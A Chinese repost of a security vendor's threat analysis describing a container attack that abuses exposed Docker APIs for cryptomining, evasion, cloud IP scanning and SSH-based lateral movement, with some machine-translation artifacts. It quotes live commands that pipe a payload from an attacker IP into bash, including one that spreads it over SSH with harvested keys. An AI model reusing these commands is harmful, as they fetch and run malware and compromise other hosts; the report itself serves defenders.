Aqua Research 团队确定了一种新的攻击媒介,这表明攻击技术和能力正在发生变化。在这些攻击中,攻击者利用容器作为入口点来发现并传播到云帐户中使用的其他资源。攻击者部署了一个干净的 Ubuntu 容器,挂载了主机文件系统,这使他们能够在主机上执行代码,然后下载了一个加密挖掘二进制文件,窃取了数据,并扫描了各种云提供商的 IP 范围。
这次攻击与我们之前调查的攻击不同,因为攻击者部署了恶意软件、他们使用 socks 代理、他们应用的规避技术,以及他们为扫描和扩展到在云中运行的实例而采取的行动。
进化攻击向量剖析
在发起攻击之前,攻击者识别了具有公共 Docker Engine API 端口的主机,然后执行了以下命令:
chroot /mnt /bin/sh -c curl -sL4 http://205.185.113.35/files/alduro | bash; |
该命令将主机的文件系统绑定到容器并执行有效负载 – 一个名为 .alduro
在提供主要攻击有效载荷时,从许多公共文件共享网站下载并执行了其他文件。
攻击者下载了一个打包的二进制文件,用作攻击者的后门。文件是从 下载的。 VirusTotal 将此文件识别为恶意文件:http[:]//205.185.113.35/files/lifxvf
有几个重要因素需要注意:
-
使用 IDA 研究文件揭示了与几篇博客文章中描述的行为的相似之处,例如:
– 使用 C&C 服务器
玩 PING-PONG – 进程名称是使用 来显示合法的。虚构的名称实际上是 SSH 服务器和客户端软件。syscall prctl(PR_SET_NAME)/usr/sbin/dropbear -
我们看到的博客文章早在 2014 年就发布了。攻击者似乎并没有从头开始创建恶意软件,而是使用了他们修改了附加功能的模板。
-
在攻击发生时,C&C 服务器已关闭。
受感染的主机通过套接字连接到端口 81 上的 C&C。建立连接后,目标主机等待来自C&C服务器的进一步命令。
以下是我们确定的命令和功能:
| 命令名称 | 行动 |
| 乒 | 向C&C服务器发出受感染主机正在运行的信号。 每 5 秒发送一个数据包 |
| 重复 | 终止连接 |
| 滚蛋 | 下载脚本并执行它alduro.sh |
| 获取本地 | 发送受感染计算机的 IP 地址 |
看看二进制文件可以处理的不同 Possible Commands
攻击链的某些部分的示例:
-
使用 Docker Engine API 部署容器
-
下载并执行恶意文件
-
下载 cryptomining 文件和配置文件
-
将 cronjobs 编写为持久性技术脚本会定期运行并禁用云已披露并破坏攻击的应用程序和安全机制
Sesa.txt -
消除威胁和安全机制
cryptominer 配置文件
应用规避技术
在这里,我们可以看到攻击的演变,因为我们注意到了几种在早期攻击中未使用的规避技术。其中之一是使用 socks 代理,该代理用作攻击者与主机内部网络之间的隧道方法。
这种隧道方法允许攻击者执行以下操作:
-
访问被网络外部阻止的组织应用程序、数据库和网站
-
掩码 网络中的入站和出站流量,以便在查询网络中的其他主机并执行操作时显示为合法
其中一种规避技术试图删除一个目录,该目录是一个扫描文件熵的实用程序。/usr/sandfly-filescan
文件中的熵是文件数据中随机性的度量。压缩或加密的文件通常具有较高的熵值。在这个攻击链中下载的所有二进制可执行文件都打包了一个“UPX packer”,这意味着它们具有高熵。
发现和横向移动
这一阶段的攻击支持了我们的说法,即新一代攻击(例如我们正在讨论的攻击)不仅针对单个主机,还试图继续并在目标网络内传播。
为了在网络内传播,按以下顺序下载和执行其他包和二进制文件:
1 –一个开源横幅抓取器二进制可执行文件,可提取尽可能多的有关网络的信息,识别弱点,并在整个网络中传播。可执行文件扫描网络,运行 DNS 查找,并生成设备建模和漏洞评估报告。
阿拉伯数字–可执行文件安装了以下软件包:
-
Masscan – 一个 IP 地址扫描器。
-
Jq – 用于处理结构化数据的包。
-
Screen – 用于在后台运行任务的软件包。
下载了包含公共云提供商(如 Amazon AWS、Google Cloud Platform 和 Microsoft Azure)的 IP 地址范围的文本文件。 接下来,Masscan 实用程序会扫描这些 IP 地址范围,以检查当前主机是否可以访问其他公共云平台上配置错误的计算机。如果成功,代码将在开放的 Docker 引擎 API 套接字上运行,以将攻击传播到尽可能多的主机。
3 –攻击者从各种文件(例如“bash_history”和“.ssh/config”)中收集了 IP 地址、SSH 密钥、主机名和用户帐户详细信息。接下来,攻击者试图使用通过尝试通过 SSH 使用收集到的凭据进行传播而收集的信息来连接并继续攻击。
ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=3 -i $key $user@$host -p $sshp "sudo curl -L http://205.185.113.35/files/alduro | sudo bash -s;" |
在此阶段,加密挖掘映像正在主机上运行,攻击者现在可以手动连接到主机并检索更多信息和凭证。
总结一下
从我们的分析中可以看出,这次攻击是攻击可以达到的演变和成熟的一个例子。扫描并深入网络内部,甚至一直到公共云帐户,从而使组织面临更大的风险。
为了显示此攻击与 MITRE 攻击矩阵的紧密程度,我们在下表中总结了攻击组件,并将攻击的每个组件与相应的 MITRE 矩阵进行映射:
原文始发于微信公众号(菜鸟小新):威胁警报:Attack Vector 使用容器有条不紊地以云资源为目标
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论